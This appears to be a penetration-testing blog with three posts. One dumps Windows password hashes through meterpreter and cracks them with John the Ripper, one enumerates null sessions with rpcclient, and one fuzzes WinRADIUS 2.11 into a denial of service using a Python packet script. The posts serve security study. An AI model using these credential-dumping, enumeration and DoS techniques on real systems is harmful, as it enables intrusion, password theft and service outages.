Cracking Windows Password Hashes with Metasploit and John

August 15th, 2013

The output of metasploit’s ‘hashdump’ can be fed directly to John to crack with format ‘nt’ or ‘nt2’. Let assume a running meterpreter session, by gaining system privileges then issuing ‘hashdump’ we can obtain a copy of all password hashes on the system:

meterpreter > getsystem
...got system (via technique 1).
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee1033bf942cfdccbb38ab9f97319d19:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
daves:1105:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
paulp:1106:aad3b435b51404eeaad3b435b51404ee:8fdecf063cdac5d8407c5b1a75826fad:::
davem:1107:aad3b435b51404eeaad3b435b51404ee:ef00760ac292f0e8da9ca1850ee5be2f:::
office1:1108:aad3b435b51404eeaad3b435b51404ee:5052340fe27eb55317e38a7876480b18:::
office2:1109:aad3b435b51404eeaad3b435b51404ee:ad0c54ced11a55168eef0429775b1f7e:::
admin:1110:aad3b435b51404eeaad3b435b51404ee:d22d7dfc2fb717d7663b47131b1e2347:::
muser1:1111:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
muser2:1112:aad3b435b51404eeaad3b435b51404ee:b180be38c6c29a74431c966e57e4a7d8:::
muser3:1113:aad3b435b51404eeaad3b435b51404ee:e50be861156e77e57e7247b3edc1d9b6:::
muser4:1114:aad3b435b51404eeaad3b435b51404ee:a2d639861ee3a2566259796b85a08bc9:::
muser5:1116:aad3b435b51404eeaad3b435b51404ee:8fb609d78209fd8e0b91bff896a73eca:::
mike:1117:aad3b435b51404eeaad3b435b51404ee:cf9d1a4a87ab69e06d014e9c06910946:::

Now we run John –

john ./pwlist.txt --format=nt --wordlist=/pentest/passwords/wordlists/rockyou.txt
Loaded 13 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
                 (Guest)
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably

Unfortunately, we could only ‘crack’ the Guest account with it’s blank password – that won’t be much use. Better luck next time or try using a bigger wordlist!

Windows Null Session Enumeration

August 10th, 2013

Null Sessions are a ‘feature’ of Windows allowing an anonymous user to connect to the IPC$ share and enumerate certain information. We can connect to this under Windows using the commands:

net use \\IP_ADDRESS\ipc$ "" /user:"" 
net use

or from Linux with:

rpcclient -U "" IP_ADDRESS

Once connected and at the “rpcclient $>” prompt, we can issue a ‘?’ to look at the supported commands. The most interesting are ‘enumdomusers’, ‘netshareenum’, ‘netshareenumall’ and ‘querydominfo’. Here’s the output against a sample lab machine:

rpcclient $> enumdomusers
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
user:[admin] rid:[0x3ef]
user:[Administrator] rid:[0x1f4]
user:[npn] rid:[0x3f0]
user:[Guest] rid:[0x1f5]

rpcclient $> querydominfo
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
Domain:		WINSRV
Server:		
Comment:	
Total Users:	13
Total Groups:	1
Total Aliases:	0
Sequence No:	899
Force Logoff:	-1
Domain Server State:	0x1
Server Role:	ROLE_DOMAIN_PDC
Unknown 3:	0x1
rpcclient $> 

Read the rest of this entry »

Fuzz to Denial of Service: WinRadius 2.11

June 10th, 2013

I set some time aside to test WinRadius yesterday. Fuzzing was done manually and using a Python script. I didn’t spend too much time on it, but I’m confident that there’s a remote code execution opportunity here. If no one else gets there first, I’ll revisit it in a few weeks.

Firstly, to ensure that our setup is good and to catch a packet, we can use ‘radclient’. I set up a user account adam/adam for testing purposes and then tried to authenticate:

Radius Client Test

Radius Client Test

radclient will form a RADIUS request from our STDIN data

Wireshark Capture

Wireshark Capture

We capture the packet we sent and the response

WinRadius 2.11

WinRadius 2.11

And we confirm that WinRadius received and accepted the request. Once this was done, we needed to create a template within Python, and did so as follows:

#!/usr/bin/python

from socket import *
import sys
import select

pwn =  "\x01" #Code 01
pwn += "\xff" #packet identifier
pwn += "\x00\x2c" #len 44
pwn += "\xd1\x56\x8a\x38\xfb\xea\x4a\x40\xb7\x8a\xa2\x7a\x8f\x3e\xae\x23" #authenticator
pwn += "\x01" #t=User-Name(1)
pwn += "\x06" #avp: l=6
pwn += "\x61\x64\x61\x6d" #adam

pwn += "\x02" #avp t=User-Password(2)
pwn += "\x12" #avp: l=18
pwn += "\xf0\x13\x57\x7e\x48\x1e\x55\xaa\x7d\x29\x6d\x7a\x88\x18\x89\x21" #password (encrypted)

address = ('192.168.200.20', 1812)
server_socket = socket(AF_INET, SOCK_DGRAM)

server_socket.sendto(pwn, address)

We can now replay this packet as we wish, and confirm through Wireshark and WinRadius that all is good and we are being authenticated. The next challenge was to start manually mangling data. After about 15 minutes of trial and error, I found that changing line 16 from \x12 to \xff caused the application to consume all CPU available and hang indefinitely. I couldn’t cause a crash although with a bit more trial and error, as well as trying different Radius requests such as start/stop accounting, etc, I’d be surprised if there wasn’t a RCE somewhere here.

WinRadius DoS Code

WinRadius DoS Code


WinRadius Crash

WinRadius Crash

The application now hangs.